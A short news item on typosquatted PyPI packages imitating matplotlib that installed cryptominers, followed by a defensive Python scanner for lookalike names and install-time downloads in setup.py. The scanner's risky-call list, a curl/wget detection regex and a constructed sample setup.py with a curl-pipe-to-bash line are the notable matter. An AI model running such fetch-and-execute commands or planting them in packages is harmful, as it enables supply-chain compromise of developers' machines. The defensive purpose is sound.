Security researcher Ax Sharma caught multiple PyPI packages installing cryptominers this week. Six different packages, most of them impersonating the popular “matplotlib” Python package used to create graphs and visualizations, used similar spellings or wording to dupe unsuspecting victims into installing the malicious package instead. In a blog post, Sharma reported that the malicious setup.py files downloaded a Bash script from a GitHub repository during package installation. These scripts in turn downloaded a cryptominer known as “Ubqminer”, which mined the Ubiq cryptocurrency. Another version of the malicious package installer opted for open-source T-Rex, which allowed the attacker to use the victim’s GPU instead of the CPU when mining.
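A defender can screen for both traits described above, a name that imitates “matplotlib” and a setup.py that fetches or runs a script at install time, before a package reaches a build machine. The following is an added example, not code from Sharma's post or from PyPI: the function names, the similarity threshold, the list of risky calls, and the sample setup.py (including the package name in it) are all constructed assumptions.

```python
import ast
import difflib
import re

POPULAR = ("matplotlib",)  # assumption: names you want to protect; extend as needed
RISKY_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.call",
               "subprocess.Popen", "subprocess.check_output",
               "urllib.request.urlopen", "urllib.request.urlretrieve",
               "requests.get"}
SHELL_FETCH = re.compile(r"\b(curl|wget)\b.*https?://|https?://\S+\.sh\b", re.I)

def lookalike_of(name, popular=POPULAR, threshold=0.8):
    """Return the popular package a name imitates, or None. Hits need human review."""
    norm = re.sub(r"[-_.]+", "", name.lower())
    for target in popular:
        if norm == target:
            return None  # the genuine name itself
        if target in norm or difflib.SequenceMatcher(None, norm, target).ratio() >= threshold:
            return target
    return None

def dotted(node):
    """Rebuild 'a.b.c' from an ast.Attribute/ast.Name chain."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))

def scan_setup_py(source):
    """Parse (never execute) setup.py and list install-time download/exec indicators."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and dotted(node.func) in RISKY_CALLS:
            findings.add(f"call:{dotted(node.func)}")
        if (isinstance(node, ast.Constant) and isinstance(node.value, str)
                and SHELL_FETCH.search(node.value)):
            findings.add("string:remote-shell-script")
    return sorted(findings)

# Constructed sample, not taken from any real package.
SAMPLE_SETUP = '''
import os
from setuptools import setup
os.system("curl -s https://example.invalid/install.sh | bash")
setup(name="matplotlb", version="0.1")
'''
```

Run it against the setup.py of an unpacked sdist, never by importing the file, since importing setup.py executes exactly the code being inspected.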